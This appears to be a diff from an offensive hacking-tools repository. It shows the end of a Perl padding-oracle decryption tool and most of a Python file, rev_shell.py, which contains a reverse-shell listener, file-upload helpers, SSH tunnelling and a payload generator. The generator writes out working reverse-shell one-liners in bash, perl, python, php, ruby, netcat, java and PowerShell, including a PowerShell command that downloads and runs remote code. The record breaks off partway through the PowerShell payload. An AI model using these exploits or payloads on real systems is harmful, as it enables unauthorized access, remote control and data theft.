# Combine the test bytes and the sample
|
||||
my $combinedTestBytes = $testBytes.$sampleBytes;
|
||||
|
||||
if ($prefix) {
|
||||
$combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes
|
||||
}
|
||||
|
||||
$combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);
|
||||
chomp($combinedTestBytes);
|
||||
|
||||
if (! $noEncodeOption) {
|
||||
$combinedTestBytes = &uri_escape($combinedTestBytes);
|
||||
}
|
||||
|
||||
my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);
|
||||
|
||||
# Ok, now make the request
|
||||
|
||||
my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
|
||||
|
||||
|
||||
my $signatureData = "$status\t$contentLength\t$location";
|
||||
$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
|
||||
|
||||
# If this is the first block and there is no padding error message defined, then cycle through
|
||||
# all possible requests and let the user decide what the padding error behavior is.
|
||||
if ($analysisMode == 0) {
|
||||
&myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);
|
||||
$oracleGuesses{$signatureData}++;
|
||||
|
||||
$responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
|
||||
|
||||
if ($byteNum == $blockSize - 1 && $i == 0) {
|
||||
&myPrint("*** Response Analysis Complete ***\n",0);
|
||||
&determineSignature();
|
||||
$analysisMode = 1;
|
||||
$repeat = 1;
|
||||
last OUTERLOOP;
|
||||
}
|
||||
}
|
||||
|
||||
my $continue = "y";
|
||||
|
||||
if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
|
||||
# This is for autoretry logic (only works on the first byte)
|
||||
if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
|
||||
$hasHit++;
|
||||
} else {
|
||||
# If there was no padding error, then it worked
|
||||
&myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
|
||||
&myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);
|
||||
|
||||
# If continually getting a hit on attempt zero, then something is probably wrong
|
||||
$falsePositiveDetector++ if ($i == 255);
|
||||
|
||||
if ($interactive == 1) {
|
||||
$continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);
|
||||
}
|
||||
|
||||
if ($continue eq "y" || $continue eq "a") {
|
||||
$interactive = 0 if ($continue eq "a");
|
||||
|
||||
# Next, calculate the decrypted byte by XORing it with the padding value
|
||||
my ($currentPaddingByte, $nextPaddingByte);
|
||||
|
||||
# These variables could allow for flexible padding schemes (for now PCKS)
|
||||
# For PCKS#7, the padding block is equal to chr($blockSize - $byteNum)
|
||||
$currentPaddingByte = chr($blockSize - $byteNum);
|
||||
$nextPaddingByte = chr($blockSize - $byteNum + 1);
|
||||
|
||||
my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;
|
||||
&myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);
|
||||
|
||||
$returnValue = $decryptedByte.$returnValue;
|
||||
&myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);
|
||||
|
||||
# Finally, update the test bytes in preparation for the next round, based on the padding used
|
||||
for (my $k = $byteNum; $k < $blockSize; $k++) {
|
||||
# First, XOR the current test byte with the padding value for this round to recover the decrypted byte
|
||||
substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));
|
||||
|
||||
# Then, XOR it again with the padding byte for the next round
|
||||
substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
|
||||
}
|
||||
last INNERLOOP;
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
## TODO: Combine these two blocks?
|
||||
if ($i == 0 && $analysisMode == 1) {
|
||||
# End of the road with no success. We should probably try again.
|
||||
&myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);
|
||||
|
||||
if ($autoRetry == 0) {
|
||||
$autoRetry = 1;
|
||||
&myPrint(" Automatically trying one more time...",0);
|
||||
$repeat = 1;
|
||||
last OUTERLOOP;
|
||||
|
||||
} else {
|
||||
if (($byteNum == $blockSize - 1) && ($error)) {
|
||||
&myPrint("\nAre you sure you specified the correct error string?",0);
|
||||
&myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
|
||||
}
|
||||
|
||||
$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
|
||||
if ($continue ne "n") {
|
||||
&myPrint("INFO: Switching to interactive mode",0);
|
||||
$interactive = 1;
|
||||
$repeat = 1;
|
||||
last OUTERLOOP;
|
||||
}
|
||||
}
|
||||
}
|
||||
if ($falsePositiveDetector == $blockSize) {
|
||||
&myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
|
||||
&myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
|
||||
if ($error) {
|
||||
&myPrint("[+] Check the error string you provided and try again, or consider running",0);
|
||||
&myPrint("[+] without an error string to perform an automated response analysis.\n",0);
|
||||
} else {
|
||||
&myPrint("[+] You may want to consider defining a custom padding error string",0);
|
||||
&myPrint("[+] instead of the automated response analysis.\n",0);
|
||||
}
|
||||
$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
|
||||
if ($continue eq "y") {
|
||||
&myPrint("INFO: Switching to interactive mode",0);
|
||||
$interactive = 1;
|
||||
$repeat = 1;
|
||||
last OUTERLOOP;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
($repeat == 1) ? ($complete = 0) : ($complete = 1);
|
||||
}
|
||||
return $returnValue;
|
||||
}
|
||||
|
||||
sub makeRequest {
|
||||
|
||||
my ($method, $url, $data, $cookie) = @_;
|
||||
my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
|
||||
my $numRetries = 0;
|
||||
$data ='' unless $data;
|
||||
$cookie='' unless $cookie;
|
||||
|
||||
$requestTracker++;
|
||||
do {
|
||||
#Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
|
||||
$ENV{HTTPS_PROXY} = "";
|
||||
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;
|
||||
|
||||
$lwp = LWP::UserAgent->new(env_proxy => 1,
|
||||
keep_alive => 1,
|
||||
timeout => 30,
|
||||
requests_redirectable => [],
|
||||
ssl_opts => { verify_hostname => 0, SSL_verify_mode => 0 },
|
||||
);
|
||||
|
||||
$req = new HTTP::Request $method => $url;
|
||||
|
||||
&myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;
|
||||
|
||||
# Add request content for POST and PUTS
|
||||
if ($data) {
|
||||
$req->content_type('application/x-www-form-urlencoded');
|
||||
$req->content($data);
|
||||
}
|
||||
|
||||
if ($proxy) {
|
||||
my $proxyUrl = "http://";
|
||||
if ($proxyAuth) {
|
||||
my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
|
||||
$ENV{HTTPS_PROXY_USERNAME} = $proxyUser;
|
||||
$ENV{HTTPS_PROXY_PASSWORD} = $proxyPass;
|
||||
$proxyUrl .= $proxyAuth."@";
|
||||
}
|
||||
$proxyUrl .= $proxy;
|
||||
$lwp->proxy(['http', 'https'], "http://".$proxy);
|
||||
$ENV{HTTPS_PROXY} = "http://".$proxy;
|
||||
}
|
||||
|
||||
|
||||
if ($auth) {
|
||||
my ($httpuser, $httppass) = split(/:/,$auth);
|
||||
$req->authorization_basic($httpuser, $httppass);
|
||||
}
|
||||
|
||||
# If cookies are defined, add a COOKIE header
|
||||
if (! $cookie eq "") {
|
||||
$req->header(Cookie => $cookie);
|
||||
}
|
||||
|
||||
if ($headers) {
|
||||
my @customHeaders = split(/;/i,$headers);
|
||||
for (my $i = 0; $i <= $#customHeaders; $i++) {
|
||||
my ($headerName, $headerVal) = split(/\::/i,$customHeaders[$i]);
|
||||
$req->header($headerName, $headerVal);
|
||||
}
|
||||
}
|
||||
|
||||
my $startTime = &gettimeofday();
|
||||
my $response = $lwp->request($req);
|
||||
my $endTime = &gettimeofday();
|
||||
$timeTracker = $timeTracker + ($endTime - $startTime);
|
||||
|
||||
if ($printStats == 1 && $requestTracker % 250 == 0) {
|
||||
print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")\n";
|
||||
$timeTracker = 0;
|
||||
}
|
||||
|
||||
|
||||
# Extract the required attributes from the response
|
||||
$status = substr($response->status_line, 0, 3);
|
||||
$content = $response->content;
|
||||
|
||||
&myPrint("Response Content:\n$content",0) if $superVerbose;
|
||||
$location = $response->header("Location");
|
||||
if (!$location) {
|
||||
$location = "N/A";
|
||||
}
|
||||
#$contentLength = $response->header("Content-Length");
|
||||
$contentLength = length($content);
|
||||
|
||||
|
||||
my $contentEncoding = $response->header("Content-Encoding");
|
||||
if ($contentEncoding) {
|
||||
if ($contentEncoding =~ /GZIP/i ) {
|
||||
$content = Compress::Zlib::memGunzip($content);
|
||||
$contentLength = length($content);
|
||||
}
|
||||
}
|
||||
|
||||
my $statusMsg = $response->status_line;
|
||||
#myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);
|
||||
|
||||
if ($statusMsg =~ /Can't connect/) {
|
||||
print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n";
|
||||
$noConnect = 1;
|
||||
$numRetries++;
|
||||
sleep 10;
|
||||
} else {
|
||||
$noConnect = 0;
|
||||
$totalRequests++;
|
||||
}
|
||||
} until (($noConnect == 0) || ($numRetries >= 15));
|
||||
if ($numRetries >= 15) {
|
||||
&myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
|
||||
exit;
|
||||
}
|
||||
return ($status, $content, $location, $contentLength);
|
||||
}
|
||||
|
||||
sub myPrint {
|
||||
my ($printData, $printLevel) = @_;
|
||||
$printData .= "\n";
|
||||
if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) {
|
||||
print $printData;
|
||||
&writeFile("ActivityLog.txt",$printData);
|
||||
}
|
||||
}
|
||||
|
||||
sub myEncode {
|
||||
my ($toEncode, $format) = @_;
|
||||
return &encodeDecode($toEncode, 0, $format);
|
||||
}
|
||||
|
||||
sub myDecode {
|
||||
my ($toDecode, $format) = @_;
|
||||
return &encodeDecode($toDecode, 1, $format);
|
||||
}
|
||||
|
||||
sub encodeDecode {
|
||||
my ($toEncodeDecode, $oper, $format) = @_;
|
||||
# Oper: 0=Encode, 1=Decode
|
||||
# Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken
|
||||
my $returnVal = "";
|
||||
if ($format == 1 || $format == 2) {
|
||||
# HEX
|
||||
if ($oper == 1) {
|
||||
#Decode
|
||||
#Always convert to lower when decoding)
|
||||
$toEncodeDecode = lc($toEncodeDecode);
|
||||
$returnVal = pack("H*",$toEncodeDecode);
|
||||
} else {
|
||||
#Encode
|
||||
$returnVal = unpack("H*",$toEncodeDecode);
|
||||
if ($format == 2) {
|
||||
#Uppercase
|
||||
$returnVal = uc($returnVal)
|
||||
}
|
||||
}
|
||||
} elsif ($format == 3) {
|
||||
# NetUrlToken
|
||||
if ($oper == 1) {
|
||||
$returnVal = &web64Decode($toEncodeDecode,1);
|
||||
} else {
|
||||
$returnVal = &web64Encode($toEncodeDecode,1);
|
||||
}
|
||||
} elsif ($format == 4) {
|
||||
# Web64
|
||||
if ($oper == 1) {
|
||||
$returnVal = &web64Decode($toEncodeDecode,0);
|
||||
} else {
|
||||
$returnVal = &web64Encode($toEncodeDecode,0);
|
||||
}
|
||||
} else {
|
||||
# B64
|
||||
if ($oper == 1) {
|
||||
$returnVal = &decode_base64($toEncodeDecode);
|
||||
} else {
|
||||
$returnVal = &encode_base64($toEncodeDecode);
|
||||
$returnVal =~ s/(\r|\n)//g;
|
||||
}
|
||||
}
|
||||
|
||||
return $returnVal;
|
||||
}
|
||||
|
||||
|
||||
sub web64Encode {
|
||||
my ($input, $net) = @_;
|
||||
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
|
||||
$input = &encode_base64($input);
|
||||
$input =~ s/(\r|\n)//g;
|
||||
$input =~ s/\+/\-/g;
|
||||
$input =~ s/\//\_/g;
|
||||
my $count = $input =~ s/\=//g;
|
||||
$count = 0 if ($count eq "");
|
||||
$input.=$count if ($net == 1);
|
||||
return $input;
|
||||
}
|
||||
|
||||
sub web64Decode {
|
||||
my ($input, $net) = @_;
|
||||
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
|
||||
$input =~ s/\-/\+/g;
|
||||
$input =~ s/\_/\//g;
|
||||
if ($net == 1) {
|
||||
my $count = chop($input);
|
||||
$input = $input.("=" x int($count));
|
||||
}
|
||||
return &decode_base64($input);
|
||||
}
|
||||
|
||||
|
||||
sub promptUser {
|
||||
my($prompt, $default, $yn) = @_;
|
||||
my $defaultValue = $default ? "[$default]" : "";
|
||||
print "$prompt $defaultValue: ";
|
||||
chomp(my $input = <STDIN>);
|
||||
|
||||
$input = $input ? $input : $default;
|
||||
if ($yn) {
|
||||
if ($input =~ /^y|n|a$/) {
|
||||
return $input;
|
||||
} else {
|
||||
&promptUser($prompt, $default, $yn);
|
||||
}
|
||||
} else {
|
||||
if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
|
||||
return $input;
|
||||
} else {
|
||||
&promptUser($prompt, $default);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub writeFile {
|
||||
my ($fileName, $fileContent) = @_;
|
||||
if ($logFiles) {
|
||||
if ($dirExists != 1) {
|
||||
system($dirCmd." ".$dirName);
|
||||
$dirExists = 1;
|
||||
}
|
||||
$fileName = $dirName.$dirSlash.$fileName;
|
||||
open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n";
|
||||
print $OUTFILE $fileContent;
|
||||
close($OUTFILE);
|
||||
}
|
||||
}
|
||||
|
||||
sub getTime {
|
||||
my ($format) = @_;
|
||||
my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time);
|
||||
my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
|
||||
my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT");
|
||||
$month=sprintf("%02d",$month);
|
||||
$day=sprintf("%02d",$day);
|
||||
$hour=sprintf("%02d",$hour);
|
||||
$minute=sprintf("%02d",$minute);
|
||||
$second=sprintf("%02d", $second);
|
||||
$year =~ s/^.//;
|
||||
if ($format eq "F") {
|
||||
return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) );
|
||||
} elsif ($format eq "S") {
|
||||
return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second;
|
||||
} else {
|
||||
return $hour.":".$minute.":".$second;
|
||||
}
|
||||
}
|
||||
580
tools/exploits/rev_shell.py
Executable file
580
tools/exploits/rev_shell.py
Executable file
@@ -0,0 +1,580 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
import socket
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import pty
|
||||
import time
|
||||
import random
|
||||
import threading
|
||||
import paramiko
|
||||
import base64
|
||||
import select
|
||||
import argparse
|
||||
import signal
|
||||
|
||||
from hackingscripts.utils import util
|
||||
from hackingscripts.tools.misc import upload_file
|
||||
|
||||
try:
|
||||
import SocketServer
|
||||
except ImportError:
|
||||
import socketserver as SocketServer
|
||||
|
||||
class ShellListener:
|
||||
|
||||
def __init__(self, addr, port):
|
||||
self.listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
self.bind_addr = addr
|
||||
self.port = port
|
||||
self.verbose = False
|
||||
self.on_message = []
|
||||
self.listen_thread = None
|
||||
self.connection = None
|
||||
self.on_connect = None
|
||||
self.features = set()
|
||||
self.shell_ready = False
|
||||
self.os = None # we need a way to find the OS here
|
||||
self.raw_output = b""
|
||||
|
||||
def startBackground(self):
|
||||
self.listen_thread = threading.Thread(target=self.start)
|
||||
self.listen_thread.start()
|
||||
return self.listen_thread
|
||||
|
||||
def has_feature(self, feature):
|
||||
return feature.lower() in self.features
|
||||
|
||||
def probe_features(self):
|
||||
if self.os == "unix":
|
||||
features = ["wget", "curl", "nc", "sudo", "telnet", "docker", "python"]
|
||||
for feature in features:
|
||||
output = self.exec_sync("whereis " + feature)
|
||||
if output.startswith(feature.encode() + b": ") and len(output) >= len(feature)+2:
|
||||
self.features.add(feature.lower())
|
||||
else:
|
||||
print("[-] Can't probe features for os:", self.os)
|
||||
|
||||
def get_features(self):
|
||||
return self.features
|
||||
|
||||
def start(self):
|
||||
self.running = True
|
||||
self.listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
self.listen_socket.bind((self.bind_addr, self.port))
|
||||
self.listen_socket.listen()
|
||||
while self.running:
|
||||
self.connection, addr = self.listen_socket.accept()
|
||||
with self.connection:
|
||||
print("[+] Got connection:", addr)
|
||||
|
||||
if self.on_connect:
|
||||
self.on_connect(addr)
|
||||
|
||||
self.shell_ready = False
|
||||
while self.running:
|
||||
data = self.connection.recv(1024)
|
||||
if not data:
|
||||
break
|
||||
|
||||
if self.os is None and not self.shell_ready:
|
||||
if b"Windows PowerShell" in data or b"Microsoft Windows" in data:
|
||||
self.os = "win"
|
||||
elif b"bash" in data or b"sh" in data:
|
||||
self.os = "unix"
|
||||
|
||||
if self.os and self.verbose:
|
||||
print("OS PROBED:", self.os)
|
||||
|
||||
if self.verbose:
|
||||
print("< ", data)
|
||||
|
||||
if self.shell_ready: # TODO: check this...
|
||||
for callback in self.on_message:
|
||||
callback(data)
|
||||
elif self.is_prompt(data):
|
||||
self.shell_ready = True
|
||||
if self.verbose:
|
||||
print("RECV first prompt")
|
||||
else:
|
||||
self.raw_output += data
|
||||
for callback in self.on_message:
|
||||
callback(data)
|
||||
|
||||
print("[-] Disconnected")
|
||||
self.connection = None
|
||||
self.running = False
|
||||
|
||||
def close(self):
|
||||
self.running = False
|
||||
self.sendline("exit")
|
||||
self.listen_socket.close()
|
||||
if self.listen_thread != threading.currentThread():
|
||||
self.listen_thread.join()
|
||||
|
||||
def send(self, data):
|
||||
if self.connection:
|
||||
if isinstance(data, str):
|
||||
data = data.encode()
|
||||
|
||||
if self.verbose:
|
||||
print("> ", data)
|
||||
|
||||
self.connection.sendall(data)
|
||||
|
||||
def sendline(self, data):
|
||||
if isinstance(data, str):
|
||||
data = data.encode()
|
||||
data += b"\n"
|
||||
return self.send(data)
|
||||
|
||||
def is_prompt(self, data):
|
||||
if self.os == "unix":
|
||||
if data.endswith(b"# ") or data.endswith(b"$ "):
|
||||
return True
|
||||
elif self.os == "win":
|
||||
if data.endswith(b"> ") or data.endswith(b">") or data.endswith(b"$ "):
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
def exec_sync(self, cmd):
|
||||
|
||||
if self.os is None:
|
||||
print("[-] OS not probed yet, waiting...")
|
||||
while self.os is None:
|
||||
time.sleep(0.1)
|
||||
if not self.shell_ready:
|
||||
print("[-] Shell not ready yet, waiting...")
|
||||
while not self.shell_ready:
|
||||
time.sleep(0.1)
|
||||
|
||||
output = b""
|
||||
complete = False
|
||||
|
||||
if isinstance(cmd, str):
|
||||
cmd = cmd.encode()
|
||||
|
||||
def callback(data):
|
||||
nonlocal output
|
||||
nonlocal complete
|
||||
|
||||
if complete:
|
||||
return
|
||||
|
||||
output += data
|
||||
if self.is_prompt(output):
|
||||
complete = True
|
||||
if self.os == "unix":
|
||||
line_ending = b"\n"
|
||||
elif self.os == "win":
|
||||
line_ending = b"\r\n"
|
||||
|
||||
if line_ending in output:
|
||||
output = output[0:output.rindex(line_ending)]
|
||||
if output.startswith(cmd + line_ending):
|
||||
output = output[len(cmd)+len(line_ending):]
|
||||
|
||||
self.on_message.append(callback)
|
||||
self.sendline(cmd)
|
||||
while not complete:
|
||||
time.sleep(0.1)
|
||||
|
||||
self.on_message.remove(callback)
|
||||
return output
|
||||
|
||||
def print_message(self, data):
|
||||
try:
|
||||
data = data.decode()
|
||||
except:
|
||||
data = str(data) # workaround so the shell doesn't die
|
||||
sys.stdout.write(data)
|
||||
sys.stdout.flush()
|
||||
|
||||
def interactive(self):
|
||||
print("[ ] Switching to interactive mode")
|
||||
self.on_message.append(lambda x: self.print_message(x))
|
||||
while self.running and self.connection is not None:
|
||||
self.sendline(input())
|
||||
|
||||
def wait(self):
|
||||
while self.running and self.connection is None:
|
||||
time.sleep(0.1)
|
||||
return self.running
|
||||
|
||||
def get_cwd(self):
|
||||
if self.os == "unix":
|
||||
return self.exec_sync("pwd").decode()
|
||||
elif self.os == "win":
|
||||
return self.exec_sync("pwd | foreach {$_.Path}").decode()
|
||||
else:
|
||||
print("[-] get_cwd not implemented for os:", self.os)
|
||||
return None
|
||||
|
||||
def write_file(self, path, data_or_fd, permissions=None, method=None, sync=False, **kwargs):
|
||||
|
||||
if method == None:
|
||||
if self.os == "win":
|
||||
method = "powershell"
|
||||
elif self.os == "unix":
|
||||
method = "echo"
|
||||
else:
|
||||
print("[-] No method specified, assuming 'echo'")
|
||||
method = echo
|
||||
|
||||
print(f"[ ] Writing file '{path}' using method: {method}")
|
||||
send_func = self.sendline if not sync else self.exec_sync
|
||||
|
||||
def write_chunk(chunk, first=False):
|
||||
chunk = base64.b64encode(chunk).decode()
|
||||
if method == "powershell":
|
||||
send_func(f"$decodedBytes = [System.Convert]::FromBase64String('{chunk}')")
|
||||
send_func(f"$stream.Write($decodedBytes, 0, $decodedBytes.Length)")
|
||||
else:
|
||||
operator = ">" if first else ">>"
|
||||
send_func(f"echo {chunk}|base64 -d {operator} {path}")
|
||||
|
||||
if method == "echo" or method == "powershell":
|
||||
|
||||
if method == "powershell":
|
||||
path = path.replace("'","\\'")
|
||||
send_func(f"$stream = [System.IO.File]::Open('{path}', [System.IO.FileMode]::Create)")
|
||||
|
||||
chunk_size = 1024
|
||||
if hasattr(data_or_fd, "read"):
|
||||
first = True
|
||||
while True:
|
||||
data = data_or_fd.read(chunk_size)
|
||||
if not data:
|
||||
break
|
||||
if isinstance(data, str):
|
||||
data = data.encode()
|
||||
write_chunk(data, first)
|
||||
first = False
|
||||
data_or_fd.close()
|
||||
else:
|
||||
if isinstance(data_or_fd, str):
|
||||
data_or_fd = data_or_fd.encode()
|
||||
for offset in range(0, len(data_or_fd), chunk_size):
|
||||
write_chunk(data_or_fd[offset:offset+chunk_size], offset == 0)
|
||||
|
||||
if method == "powershell":
|
||||
send_func(f"$stream.Close()")
|
||||
|
||||
elif method == "nc" or method == "netcat":
|
||||
ip_addr = util.get_address()
|
||||
bin_path = "nc" if not "bin_path" in kwargs else kwargs["bin_path"]
|
||||
port = None if "listen_port" not in kwargs else int(kwargs["listen_port"])
|
||||
sock = util.open_server(ip_addr, port, retry=False)
|
||||
if not sock:
|
||||
return False
|
||||
|
||||
def serve_file():
|
||||
upload_file.serve_file(sock, data_or_fd, forever=False)
|
||||
|
||||
port = sock.getsockname()[1]
|
||||
upload_thread = threading.Thread(target=serve_file)
|
||||
upload_thread.start()
|
||||
send_func(f"{bin_path} {ip_addr} {port} > {path}")
|
||||
upload_thread.join()
|
||||
else:
|
||||
print("[-] Unknown write-file method:", method)
|
||||
return False
|
||||
|
||||
if permissions and self.os == "unix":
|
||||
send_func(f"chmod {permissions} {path}")
|
||||
|
||||
print("[+] Done!")
|
||||
|
||||
class ParamikoTunnelServer(SocketServer.ThreadingTCPServer):
|
||||
daemon_threads = True
|
||||
allow_reuse_address = True
|
||||
|
||||
class ParamikoTunnel:
|
||||
def __init__(self, shell, ports):
|
||||
self.shell = shell
|
||||
self.ports = ports
|
||||
self.verbose = False
|
||||
self.is_running = True
|
||||
self.on_message = []
|
||||
self.listen_threads = []
|
||||
self.servers = []
|
||||
|
||||
def start_background(self):
|
||||
for port in self.ports:
|
||||
thread = threading.Thread(target=self.start, args=(port, ))
|
||||
thread.start()
|
||||
self.listen_threads.append(thread)
|
||||
return self.listen_threads
|
||||
|
||||
def start(self, port):
|
||||
this = self
|
||||
class SubHandler(ParamikoTunnelHandler):
|
||||
peer = this.shell.get_transport().sock.getpeername()
|
||||
chain_host = "127.0.0.1"
|
||||
chain_port = port
|
||||
ssh_transport = this.shell.get_transport()
|
||||
def log(self, message):
|
||||
if this.verbose:
|
||||
print(message)
|
||||
|
||||
forward_server = ParamikoTunnelServer(("127.0.0.1", port), SubHandler)
|
||||
self.servers.append(forward_server)
|
||||
forward_server.serve_forever()
|
||||
|
||||
def close(self):
|
||||
self.is_running = False
|
||||
for server in self.servers:
|
||||
server._BaseServer__shutdown_request = True
|
||||
for thread in self.listen_threads:
|
||||
thread.join()
|
||||
|
||||
class ParamikoTunnelHandler(SocketServer.BaseRequestHandler):
|
||||
def handle(self):
|
||||
try:
|
||||
chan = self.ssh_transport.open_channel(
|
||||
"direct-tcpip",
|
||||
(self.chain_host, self.chain_port),
|
||||
self.request.getpeername(),
|
||||
)
|
||||
except Exception as e:
|
||||
self.log(
|
||||
"Incoming request to %s:%d failed: %s"
|
||||
% (self.chain_host, self.chain_port, repr(e))
|
||||
)
|
||||
return
|
||||
if chan is None:
|
||||
self.log(
|
||||
"Incoming request to %s:%d was rejected by the SSH server."
|
||||
% (self.chain_host, self.chain_port)
|
||||
)
|
||||
return
|
||||
|
||||
self.log(
|
||||
"Connected! Tunnel open %r -> %r -> %r"
|
||||
% (
|
||||
self.request.getpeername(),
|
||||
chan.getpeername(),
|
||||
(self.chain_host, self.chain_port),
|
||||
)
|
||||
)
|
||||
while True:
|
||||
r, w, x = select.select([self.request, chan], [], [])
|
||||
if self.request in r:
|
||||
data = self.request.recv(1024)
|
||||
if len(data) == 0:
|
||||
break
|
||||
chan.send(data)
|
||||
if chan in r:
|
||||
data = chan.recv(1024)
|
||||
if len(data) == 0:
|
||||
break
|
||||
self.request.send(data)
|
||||
|
||||
peername = self.request.getpeername()
|
||||
chan.close()
|
||||
self.request.close()
|
||||
self.log("Tunnel closed from %r" % (peername,))
|
||||
|
||||
def generate_payload(payload_type, local_address, port, index=None, **kwargs):
|
||||
|
||||
commands = []
|
||||
shell = kwargs.get("shell", "/bin/bash")
|
||||
|
||||
if payload_type in ["sh", "bash"]:
|
||||
protocol = kwargs.get("protocol", "tcp")
|
||||
assert protocol in ["tcp", "udp"]
|
||||
payload = f"{payload_type} -i >& /dev/{protocol}/{local_address}/{port} 0>&1"
|
||||
elif payload_type == "perl":
|
||||
method = kwargs.get("method", "exec")
|
||||
if method == "exec":
|
||||
payload = f"perl -e 'use Socket;$i=\"{local_address}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/{shell} -i\");}};'"
|
||||
else:
|
||||
payload = f"perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"{local_address}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
|
||||
elif re.match(r"python((2|3)(\.[0-9]+)?)?", payload_type):
|
||||
payload = f"{payload_type} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{local_address}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/{shell}\",\"-i\"]);'"
|
||||
elif payload_type == "php":
|
||||
payload = f"php -r '$sock=fsockopen(\"{local_address}\",{port});exec(\"/{shell} -i <&3 >&3 2>&3\");'"
|
||||
elif payload_type == "ruby":
|
||||
payload = f"ruby -rsocket -e'f=TCPSocket.open(\"{local_address}\",{port}).to_i;exec sprintf(\"{shell} -i <&%d >&%d 2>&%d\",f,f,f)'"
|
||||
elif payload_type in ["netcat", "nc", "ncat"]:
|
||||
method = kwargs.get("method", "fifo")
|
||||
if method == "fifo":
|
||||
fifo_name = kwargs.get("fifo_name", "f")
|
||||
payload = f"rm /tmp/{fifo_name};mkfifo /tmp/{fifo_name};cat /tmp/{fifo_name}|{shell} -i 2>&1|{payload_type} {local_address} {port} >/tmp/{fifo_name}"
|
||||
else:
|
||||
payload = f"{payload_type} {local_address} {port} -e {shell}"
|
||||
elif payload_type == "java":
|
||||
payload = f"r = Runtime.getRuntime()\np = r.exec([\"{shell}\",\"-c\",\"exec 5<>/dev/tcp/{local_address}/{port};cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()"
|
||||
elif payload_type == "xterm":
|
||||
payload = f"xterm -display {local_address}:1"
|
||||
elif payload_type == "powercat":
|
||||
shell = kwargs.get("shell", "cmd")
|
||||
http_port = kwargs.get("http_port", 80)
|
||||
return f"powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://{local_address}:{http_port}/powercat.ps1');powercat -c {local_address} -p {port} -e {shell}\""
|
||||
elif payload_type == "powershell":
|
||||
payload = '$a=New-Object System.Net.Sockets.TCPClient("%s",%d);$d=$a.GetStream();[byte[]]$k=0..65535|%%{0};while(($i=$d.Read($k,0,$k.Length)) -ne 0){;$o=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($k,0,$i);$q=(iex $o 2>&1|Out-String);$c=$q+"$ ";$b=([text.encoding]::ASCII).GetBytes($c);$d.Write($b,0,$b.Length);$d.Flush()};$a.Close();' % (local_address, port)
|
||||
if kwargs.get("method", "process") == "process":
|
||||
payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
|
||||
